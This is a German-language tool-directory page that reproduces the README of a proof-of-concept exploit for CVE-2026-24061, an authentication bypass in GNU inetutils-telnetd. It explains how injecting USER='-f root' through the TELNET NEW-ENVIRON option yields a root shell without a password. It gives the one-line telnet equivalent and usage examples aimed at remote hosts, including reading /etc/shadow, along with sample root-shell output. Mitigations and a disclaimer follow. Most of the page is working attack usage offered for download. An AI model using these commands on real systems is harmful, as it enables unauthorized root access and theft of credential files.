Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24061 — inetutils-telnetd Authentifizierungsumgehung - funktionsfähig | Kitploit
Tools/GitHubGitHub/balgan/cve-2026-24061
SchwachstellenanalyseExploitationWebanwendungs-ExploitationNetzwerksicherheitPenetrationstestsAuthentifizierung
GitHubbalgan/cve-2026-24061

CVE-2026-24061

inetutils-telnetd Authentifizierungsumgehung - funktionsfähig

Repository anzeigen
3vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-24061 — inetutils-telnetd Authentication Bypass

Ein Proof-of-Concept-Exploit für die Authentifizierungs-Bypass-Schwachstelle in GNU inetutils-telnetd.

Übersicht

CVE-2026-24061 ist eine kritische Authentifizierungs-Bypass-Schwachstelle, die inetutils-telnetd in den Versionen 1.9.3 bis 2.7 betrifft. Sie ermöglicht einem entfernten Angreifer, ohne Angabe von Anmeldeinformationen eine Root-Shell auf verwundbaren Systemen zu erhalten.

Details zur Schwachstelle

FeldWert
CVE-IDCVE-2026-24061
Betroffene SoftwareGNU inetutils-telnetd
Betroffene Versionen1.9.3 – 2.7
SchwachstellentypAuthentifizierungs-Bypass
CVSS-ScoreKritisch
AngriffsvektorNetzwerk

So funktioniert es

Die Schwachstelle nutzt einen Fehler in der Art und Weise, wie telnetd die über die TELNET-NEW-ENVIRON-Option (RFC 1572) während der Protokollaushandlung empfangene Umgebungsvariable USER verarbeitet.

  1. TELNET-Protokollaushandlung: Wenn ein Client eine Verbindung herstellt, handeln Server und Client Fähigkeiten aus, einschließlich der NEW-ENVIRON-Option, die es dem Client ermöglicht, Umgebungsvariablen zu senden.

  2. Bösartiger USER-Wert: Der Exploit sendet USER=-f root als Umgebungsvariable während dieser Aushandlungsphase.

  3. Unsicheres Übergeben von Argumenten: Das verwundbare telnetd übergibt diesen Wert unbereinigt an das Programm login.

  4. Befehlsinjektion: Das Programm login interpretiert -f root als Befehlszeilen-Flags:

    • -f = „Login ohne Authentifizierung erzwingen“
    • root = der Benutzername, mit dem angemeldet werden soll
  5. Root-Zugriff: Der Angreifer erhält eine Root-Shell, ohne jemals nach einem Passwort gefragt zu werden.

Das Kernproblem

root@kitploit:~
Client sendet:  USER = "-f root"
telnetd führt aus:  login -f root
Ergebnis:        Root-Shell ohne Authentifizierung gewährt

Dies entspricht der Ausführung von USER='-f root' telnet -a localhost auf einem System mit einem verwundbaren telnetd.

Anforderungen

  • Python 3.6+
  • Keine externen Abhängigkeiten (verwendet nur die Standardbibliothek)

Installation

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-24061.git
cd CVE-2026-24061
chmod +x exploit.py

Verwendung

root@kitploit:~
./exploit.py [OPTIONEN] <ziel>

Optionen

OptionBeschreibungStandard
hostZiel-Hostname oder IP-AdresseErforderlich
-p, --portZiel-Port23
-u, --userZu injizierender USER-Wert-f root
-c, --commandEinzelnen Befehl ausführen (nicht-interaktiv)Keiner
-t, --timeoutVerbindungs-Timeout in Sekunden10

Beispiele

Interaktive Root-Shell auf localhost:

root@kitploit:~
./exploit.py localhost

Interaktive Root-Shell auf entferntem Host:

root@kitploit:~
./exploit.py 192.168.1.100

Einzelnen Befehl ausführen und beenden:

root@kitploit:~
./exploit.py -c "id" localhost
./exploit.py -c "cat /etc/shadow" 192.168.1.100
./exploit.py -c "whoami && hostname" target.local

Als anderer Benutzer anmelden:

root@kitploit:~
./exploit.py -u "-f admin" localhost
./exploit.py -u "-f postgres" database-server

Nicht standardmäßiger Port:

root@kitploit:~
./exploit.py -p 2323 localhost

Optionen kombinieren:

root@kitploit:~
./exploit.py -p 2323 -c "uname -a" -t 5 192.168.1.100

Interaktiver Modus

Wenn ohne das Flag -c ausgeführt, bringt Sie der Exploit in eine interaktive Shell:

  • Vollständige TTY-Unterstützung mit ordnungsgemäßer Terminalverarbeitung
  • Drücken Sie Strg+] zum Verlassen und Schließen der Verbindung
  • Drücken Sie Strg+C zum Unterbrechen

Beispielausgabe

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  CVE-2026-24061 - inetutils-telnetd Authentication Bypass    ║
║  Affects: inetutils-telnetd 1.9.3 - 2.7                      ║
╚══════════════════════════════════════════════════════════════╝

[*] Connected to 192.168.1.100:23
[*] Negotiating TELNET options...
[*] Agreed to NEW-ENVIRON (sending USER='-f root')
[+] Sent USER='-f root' via NEW-ENVIRON

Linux vulnerable-host 5.15.0 #1 SMP x86_64 GNU/Linux

root@vulnerable-host:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnerable-host:~# 

Gegenmaßnahmen

Sofortmaßnahmen

  1. telnetd deaktivieren: Wenn nicht unbedingt erforderlich, den Telnet-Dienst vollständig deaktivieren

    root@kitploit:~
    sudo systemctl stop inetutils-telnetd
    sudo systemctl disable inetutils-telnetd
    
  2. SSH stattdessen verwenden: Telnet für den Fernzugriff durch SSH ersetzen

    root@kitploit:~
    sudo apt install openssh-server
    
  3. Firewall-Regeln: Port 23 für nicht vertrauenswürdige Netzwerke blockieren

    root@kitploit:~
    sudo ufw deny 23/tcp
    

Langfristige Lösung

  • Auf eine gepatchte Version von inetutils aktualisieren, sobald verfügbar
  • Hersteller-Sicherheitshinweise auf Sicherheitspatches überwachen

Technische Details

Der Exploit implementiert einen minimalen TELNET-Client, der:

  1. Eine TCP-Verbindung zum Ziel herstellt
  2. Auf TELNET-Optionsaushandlungen (DO/DONT/WILL/WONT) antwortet
  3. Wenn der Server Umgebungsvariablen über NEW-ENVIRON anfordert:
    • Sendet USER=-f root in der ENV_IS-Antwort
  4. Terminaltyp- (TTYPE) und Fenstergrößen- (NAWS) Aushandlungen verarbeitet
  5. Interaktive oder Befehlsausführungsmodi bereitstellt

Relevante RFCs

  • RFC 854 — TELNET-Protokollspezifikation
  • RFC 1572 — TELNET-Umgebungsoption

Haftungsausschluss

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.

  • Verwenden Sie diesen Exploit nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben
  • Unbefugter Zugriff auf Computersysteme ist in den meisten Rechtsordnungen illegal
  • Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden

Lizenz

MIT-Lizenz — Siehe LICENSE für Details.

Referenzen

  • CVE-2026-24061 Details
  • GNU inetutils
  • TELNET-Protokoll RFC 854
Tool herunterladen